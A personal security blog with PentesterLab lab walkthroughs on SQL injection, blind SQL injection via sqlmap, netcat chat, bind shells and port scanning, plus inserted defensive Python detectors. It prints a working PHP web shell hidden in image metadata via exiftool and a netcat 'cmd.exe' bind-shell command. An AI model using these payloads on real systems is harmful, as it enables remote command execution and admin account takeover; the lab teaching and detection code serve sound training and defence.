Sunday, 19 June 2016

sql injection

Good night everyone.
So tonight I'm going to show you how to do a SQL injection. You already know that I did blind SQL injection in my older post, but this time I'm going to do a regular SQL injection, which is much easier than the blind one.

So I'm using two machines: Kali Linux and the lab ISO from_sqli_to_shell_pg_edition_i386.iso (you can download the ISO file from PentesterLab; just type "from sql to shell" into Google).

So fire up your Kali Linux and the target machine. Make sure you can ping the website. This will be the page of the target website. Let's just cut to the chase: I tried every link to find which one is vulnerable to SQL injection by putting a single quote into the URL parameters, and yeah, I found it at cat.php.



Alternatively, I can brute-force the web directories to save time guessing the table or column names.



So there you go, there's a whole list of your target's web directories.

But if you want to do it manually, first you have to determine how many columns are actually in use. You can do that with the ORDER BY clause: add a number to ORDER BY and increase it to determine how many columns they use.

So I got this error message when putting the value 5 in ORDER BY:


So there are 4 columns. After determining the count, let's figure out what data type each column uses; you can test every position using the UNION command.





And after that you can also retrieve the version, current_user and database name using the UNION command.
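To make the ORDER BY observation above concrete from the defender's side, here is an added Python/sqlite3 stand-in; it is not code from this post or from the PentesterLab exercise. It shows a cat.php-style lookup that glues the request parameter into the SQL text, the ORDER BY walk that reads the column count out of the resulting error, and the parameterized version of the same lookup, against which the same input is only ever a value. The table layout, names and rows are constructed for the example.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the lab's MySQL backend: an in-memory SQLite
    table with four columns, matching the count the ORDER BY probe revealed."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE pictures(id INTEGER, title TEXT, filename TEXT, cat INTEGER)"
    )
    db.executemany(
        "INSERT INTO pictures VALUES (?, ?, ?, ?)",
        [(1, "ruxcon", "ruxcon.jpg", 1), (2, "black hat", "bh.jpg", 1),
         (3, "puppy", "puppy.jpg", 2)],
    )
    return db


def vulnerable_lookup(db, cat):
    """cat.php-style query: the request parameter is glued into the SQL text,
    so whatever follows the number is parsed as SQL."""
    sql = "SELECT id, title, filename, cat FROM pictures WHERE cat=" + str(cat)
    return db.execute(sql).fetchall()


def safe_lookup(db, cat):
    """Hardened form: the value is bound as a parameter and can only ever be a
    value, never part of the query structure."""
    sql = "SELECT id, title, filename, cat FROM pictures WHERE cat=?"
    return db.execute(sql, (cat,)).fetchall()


def probe_column_count(lookup, db, max_cols=20):
    """The ORDER BY walk from the post: the first n for which 'ORDER BY n'
    errors out is one past the real column count. Returns None when the
    lookup never errors, which is what the parameterized version gives."""
    for n in range(1, max_cols + 1):
        try:
            lookup(db, "1 ORDER BY %d" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", probe_column_count(vulnerable_lookup, db))  # 4
    print("parameterized:", probe_column_count(safe_lookup, db))    # None
```

The error text SQLite returns ("1st ORDER BY term out of range") is what gives the count away, exactly as the lab's MySQL error does; the parameterized lookup never reaches the parser with attacker text, so there is nothing to read.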


So we got all the necessary information. Let's identify the column and table names using this command:





Now for the fun part: you can retrieve the admin account and password using this command.
Aha! We got the admin account and password, but it's a hash. No worries, we can solve this in two ways: either with a search engine or with John the Ripper.

So right now I'm using a search engine to look up the hash. Just copy-paste the hash and voilà! This hash had already been cracked on some website, so the password was "P4ssw0rd".

As you can see, we have now taken control of the admin account.
Have a nice day ^_^ I'm literally on the rooftop right now because the connection was bad at my flat.

netcat (chat and remote shell)

So today I'm going to give you a tutorial on how to use netcat to chat between different computers and to create a remote shell.

netcat for chat:

This is pretty easy to do. Set up two different machines; mine were Kali Linux as the client and Windows XP as the listener.


For the listener, type: nc -l -p 8390 (which port to use is up to you)
For the client, type: nc 171.16.139.134 8390 (the listener's IP address and the port the listener set)

And voilà! You can already chat between the two machines. Note that this connection is not encrypted, so the chat crosses the network in plain text.








remote shell:
So before we start, what is a remote shell? A remote shell is a command-line program that executes shell commands as another user on another computer. So basically you can control another computer. In this tutorial I won't show you how to use a remote shell for black-hat stuff; I'll show you the white-hat use (log file troubleshooting).

It's pretty easy.

Now my listener machine will be Windows XP and Kali Linux will be the client.

For the listener: nc -Lp 8390 -vv -e cmd.exe (8390 is the port number)

-L = persistent listening mode (Windows netcat: keeps listening after a client disconnects); -p = the port
-vv = extra verbose mode (useful for transferring files)
-e = execute a program (here cmd.exe) and hand it to whoever connects; this is the option netcat's own source calls a gaping security hole, because no authentication is involved

And at the client machine type: nc 172.16.139.134 8390 (the listener's IP address and port)
And voilà! You're already inside the system.
In this picture, to show that I'm already inside the listener machine, I created a directory called i_inside_you (yeah!).
Cool huh?!
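Since -e hands a shell to whoever reaches the port, what a defender mostly wants is to notice it running. As an added example that is not from this post, here is a small Python check over process-list lines: it recognises the netcat family, unbundles short options like the post's -Lp, and reports every instance that will exec a program on connect. The sample process lines are constructed for the example.

```python
import shlex

# Constructed process-list lines (pid followed by the command line), written for
# this example; they are not output captured from the post's machines.
SAMPLE_PROCESSES = """\
1021 /usr/bin/nc -l -p 8390
1044 nc -Lp 8390 -vv -e cmd.exe
1100 nc 172.16.139.134 8390
1133 /bin/sh /usr/local/bin/backup.sh
1190 ncat -l 4444 --exec /bin/bash
"""

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.exe", "ncat.exe"}


def parse_process_line(line):
    """Split 'pid command args...' into (int pid, argv list)."""
    pid, _, cmdline = line.strip().partition(" ")
    return int(pid), shlex.split(cmdline)


def classify_netcat(argv):
    """Return None if argv is not a netcat-family binary, otherwise a dict
    telling whether it listens and which program (if any) it hands to peers."""
    name = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if name not in NETCAT_NAMES:
        return None
    listening, executes = False, None
    for i, arg in enumerate(argv[1:], start=1):
        if arg == "--listen":
            listening = True
        elif arg in ("--exec", "--sh-exec"):
            executes = argv[i + 1] if i + 1 < len(argv) else ""
        elif arg.startswith("-") and not arg.startswith("--") and len(arg) > 1:
            # short options may be bundled, as in the post's -Lp
            for ch in arg[1:]:
                if ch in "lL":
                    listening = True
                elif ch in "ec":
                    executes = argv[i + 1] if i + 1 < len(argv) else ""
                    break  # -e/-c take the next argument as the program
    return {"listening": listening, "executes": executes}


def find_shell_listeners(process_text):
    """Return [(pid, program)] for every netcat that execs a program on connect."""
    hits = []
    for line in process_text.splitlines():
        if not line.strip():
            continue
        pid, argv = parse_process_line(line)
        info = classify_netcat(argv) if argv else None
        if info and info["executes"] is not None:
            hits.append((pid, info["executes"]))
    return hits


if __name__ == "__main__":
    for pid, prog in find_shell_listeners(SAMPLE_PROCESSES):
        print("pid %d hands %s to anyone who connects" % (pid, prog))
```

The plain chat listener (pid 1021) and the client (pid 1100) are left alone; only the two processes that exec a program are reported, which is the distinction that matters when triaging a host.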

have a nice day ^_^

Saturday, 18 June 2016

netcat for banner grabbing and port scanning

So you all must know about netcat, right? Netcat is a simple Unix utility which reads and writes data across network connections, using the TCP or UDP protocol. Netcat can be used for many things: backdoors, chat, banner grabbing and also port scanning. But today I'm going to give a tutorial on how to use netcat for banner grabbing and port scanning.

banner grabbing

So I'm using Windows XP, which already has netcat installed.



As you can see, netcat returned what server software they actually use, but this method isn't really stealthy because the request will be recorded in the server's logs.

port scanning:
Netcat can also be used for port scanning. Even though it's not as sophisticated as nmap, netcat can be your alternative.

Type "nc -v -w 1 <target ip address> -z <first port>-<last port>"
-v = verbose
-w 1 = timeout (in seconds) for each connect
-z = zero-I/O mode: only report whether each port is listening, without sending any data; the port range goes at the end of the command




As you can see, closed ports are indicated with a timeout and open ports are indicated with "open".
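From the target's side, the scan above is a burst of connects to different ports, most of them failing. As an added Python example that is not from this post, here is the matching detection over constructed connection-log lines: it groups events by source and flags any source that touches at least five distinct ports within one minute. The log format is made up for the example; a real firewall or netflow export would need its own parser.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed connection-log lines for this example (time, source, target:port,
# outcome); not a capture from the post's lab network.
SAMPLE_LOG = """\
2016-06-18 21:00:01 172.16.139.1 -> 172.16.139.137:21 timeout
2016-06-18 21:00:02 172.16.139.1 -> 172.16.139.137:22 timeout
2016-06-18 21:00:03 172.16.139.1 -> 172.16.139.137:80 open
2016-06-18 21:00:04 172.16.139.1 -> 172.16.139.137:443 timeout
2016-06-18 21:00:05 172.16.139.1 -> 172.16.139.137:3306 timeout
2016-06-18 21:00:06 172.16.139.1 -> 172.16.139.137:8080 timeout
2016-06-18 21:05:00 172.16.139.50 -> 172.16.139.137:80 open
2016-06-18 21:05:30 172.16.139.50 -> 172.16.139.137:80 open
2016-06-18 22:10:00 172.16.139.1 -> 172.16.139.137:80 open
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) -> \S+:(\d+) (\w+)$")


def parse_line(line):
    """Return (timestamp, source ip, destination port, outcome) or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
    return ts, m.group(2), int(m.group(3)), m.group(4)


def detect_scans(log_text, min_ports=5, window=timedelta(seconds=60)):
    """Flag sources that touched at least min_ports distinct ports within any
    window-sized span. Returns {source: most distinct ports seen in one window}.
    A nc -z sweep shows up as many one-off connects, most of them timeouts."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed:
            ts, src, port, _ = parsed
            events[src].append((ts, port))
    alerts = {}
    for src, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until it spans at most `window`
            while evs[end][0] - evs[start][0] > window:
                start += 1
            ports = {port for _, port in evs[start:end + 1]}
            if len(ports) >= min_ports:
                alerts[src] = max(len(ports), alerts.get(src, 0))
    return alerts


if __name__ == "__main__":
    for src, n in detect_scans(SAMPLE_LOG).items():
        print("%s probed %d distinct ports within a minute" % (src, n))
```

The sliding window is what separates a scan from normal traffic: the second source hits port 80 repeatedly and never trips the rule, while the sweep with a one-second timeout is flagged after six ports. The threshold and window are tuning knobs, not fixed truths.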

have a nice day ^_^

blind sql injection (from sql to shell II)

So today I'm going to show you how to conduct a blind SQL injection. In this tutorial I'm using the exercise from PentesterLab, and here is the URL: https://pentesterlab.com/exercises/from_sqli_to_shell_II/

Before getting into business, let me explain what blind SQL injection is. "Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather than getting a useful error message, they get a generic page specified by the developer instead." (http://www.cgisecurity.com/questions/blindsql.shtml)

So basically we don't look for error messages from the database back end; instead we ask the database true or false questions and determine the answer based on the application's response. It's like a guessing game, and more difficult than regular SQL injection, but even if database error messages are turned off a hacker can still run a blind SQL injection attack.

Set up all the necessary tools:
-Kali Linux (https://www.kali.org/)
-ISO image of the SQL injection lab (from_sqli_to_shell_II_i386.iso)

If you successfully run the ISO image, type "ifconfig" to see the web server's IP address, then type that IP address into your browser and it will load the web page.



This is one of the pages that the website has.
Before doing blind SQL injection, let's try some fingerprinting. For fingerprinting I use netcat and telnet (to cross-check).


Well, as you can see, the server they're using is nginx/0.7.67. I also used Burp Suite and nmap to see the open ports and to map the application, but yeah, I forgot to screenshot Burp Suite.

As you can see, the OS they use is Linux 2.6.32 and only port 80 is open. Then, working from the mapped structure of the web application, I actually tried every link of the web application with sqlmap to see if it's vulnerable to blind SQL injection.

After a few rounds of trial and error I found one link that is vulnerable to blind SQL injection, which is "http://172.16.139.137/show.php".

As you can see, when I fed the link to sqlmap, sqlmap showed that this link is vulnerable to blind SQL injection. So from this information I tried to exploit the database.



Now from this we know that there are two databases, information_schema and photoblog. Let's try to see the contents of the photoblog database.






Now from the photoblog database we can see that there are 4 tables. We focus on the users table because it will contain the usernames and passwords.



Now from the content of the table there is only one user, admin, but the password is hashed. You can use a dictionary-based attack to recover the real content of the hash.

Aha! Now from this we get the username and the password. Go to the admin page and enter the password.


As you can see, we finally took over the admin account. From here you can actually put a backdoor inside using PHP to execute commands. But in the administration page you can only store a picture in the database, so how do you conceal a backdoor inside the picture? Well, there are actually a lot of ways to do it, but in this tutorial I use exiftool.

This tool can inject the PHP code inside the image. A simple piece of code to create a backdoor using PHP:

"<?php $cmd=$_GET ['cmd'] ; system ($cmd); ?>"

I suggest you don't split the code across several lines, because when I tried that the backdoor didn't work.

Now download any image and type this to create the backdoor:

"exiftool "-comment<=backdoor.php" image.png"

If it succeeds you can remotely execute commands like this:


Well, in order to see the output, click "view page source".

As you can see, the backdoor is successfully injected into the web application. Pretty cool, heh! One suggestion: update your sqlmap to get more satisfying results; I ran an older sqlmap for two days and it wasn't working.
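The exiftool step works because the PHP open tag survives inside the image's metadata and is later handed to the PHP interpreter. From the defender's side, the upload handler can refuse or re-encode files whose metadata carries such a tag. Here is an added Python example of that check; it is not code from this post or from PentesterLab. It walks the PNG chunk structure, inflates the compressed text variants, and reports any text chunk containing a PHP open tag. The make_png helper builds a constructed 1x1 PNG so the check runs offline; the example assumes the comment lands in a tEXt or zTXt chunk, which is where PNG keeps text metadata (a JPEG COM segment would need its own parser).

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
PHP_OPEN_TAGS = (b"<?php", b"<?=", b"<script language=\"php\"")


def png_chunks(data):
    """Yield (chunk type, payload) for each chunk of a PNG byte string."""
    if data[:8] != PNG_SIGNATURE:
        raise ValueError("not a PNG file")
    pos = 8
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        yield ctype, data[pos + 8:pos + 8 + length]
        pos += 12 + length  # 4 length + 4 type + payload + 4 CRC


def text_chunks(data):
    """Return (keyword, text bytes) for every tEXt, zTXt and iTXt chunk,
    inflating the compressed variants so hidden text is not missed."""
    out = []
    for ctype, payload in png_chunks(data):
        if ctype == b"tEXt":
            keyword, _, text = payload.partition(b"\x00")
        elif ctype == b"zTXt":
            keyword, _, rest = payload.partition(b"\x00")
            text = zlib.decompress(rest[1:])  # rest[0] is the compression method
        elif ctype == b"iTXt":
            keyword, _, rest = payload.partition(b"\x00")
            compressed = rest[0] == 1
            rest = rest[2:]  # skip compression flag and method
            _lang, _, rest = rest.partition(b"\x00")
            _translated, _, text = rest.partition(b"\x00")
            if compressed:
                text = zlib.decompress(text)
        else:
            continue
        out.append((keyword.decode("latin-1"), text))
    return out


def find_php_in_png(data):
    """Return the keywords of text chunks carrying a PHP open tag."""
    return [kw for kw, text in text_chunks(data)
            if any(tag in text.lower() for tag in PHP_OPEN_TAGS)]


def _chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def make_png(comment=None, compressed=False):
    """Build a constructed 1x1 PNG, optionally with a Comment text chunk of the
    kind a metadata editor writes (tEXt, or zTXt when compressed=True)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    chunks = [_chunk(b"IHDR", ihdr)]
    if comment is not None:
        if compressed:
            chunks.append(_chunk(b"zTXt", b"Comment\x00\x00" + zlib.compress(comment)))
        else:
            chunks.append(_chunk(b"tEXt", b"Comment\x00" + comment))
    chunks.append(_chunk(b"IDAT", zlib.compress(b"\x00\xff\x00\x00")))  # filter byte + one RGB pixel
    chunks.append(_chunk(b"IEND", b""))
    return PNG_SIGNATURE + b"".join(chunks)


if __name__ == "__main__":
    print(find_php_in_png(make_png(b"holiday photo")))            # []
    print(find_php_in_png(make_png(b"<?php echo 'marker'; ?>")))  # ['Comment']
```

Metadata scanning is the second line of defence here; the first is to make sure an uploaded image is never handed to the PHP interpreter at all, for example by re-encoding it on upload (which drops the comment) and serving it from a location where PHP does not execute.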

have a great day ^_^